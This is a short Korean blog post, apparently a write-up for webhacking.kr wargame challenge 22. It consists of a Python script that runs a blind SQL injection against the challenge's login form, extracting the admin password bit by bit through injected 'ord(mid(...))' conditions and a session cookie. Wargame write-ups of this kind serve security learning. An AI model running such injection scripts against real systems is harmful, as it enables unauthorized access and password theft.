[webhacking.kr]22번 blind sql injection binary search

war game/webhacking.kr

[webhacking.kr]22번 blind sql injection binary search

shnec 2017. 1. 30. 04:36

import http.client
import urllib
import math
def fetch_string(statement):
    # skip fetching length
    length = 32

    ret = ''
    for i in range(1, length + 1):
        tmp =''
        for x in range(8):
            tmp += '1' if test('ord(mid(%s,%d,1))&%d'%(statement,i,2**x)) else '0'
            #tmp+=
        print(tmp[::-1])
        print(tmp)
        ret+=chr(int(tmp[::-1],2))
        print(ret)
        
    return ret
def test(cond):
    c = http.client.HTTPConnection('webhacking.kr')
    head={'Host':'webhacking.kr'}
    head['Upgrade-Insecure-Requests']='1'
    head['Content-Type']='application/x-www-form-urlencoded'
    head['Cookie']='id=rbc; PHPSESSID=7e74a61eb46338352194ab8d2d1535db'
    _body='uuid=admin%27+and+{}%23&pw=123'.format(urllib.parse.quote(cond))
    c.request('POST','/challenge/bonus/bonus-2/index.php',headers=head, body=_body)
    res=c.getresponse().read().decode()
    return 'Wrong!' not in res
fetch_string('pw')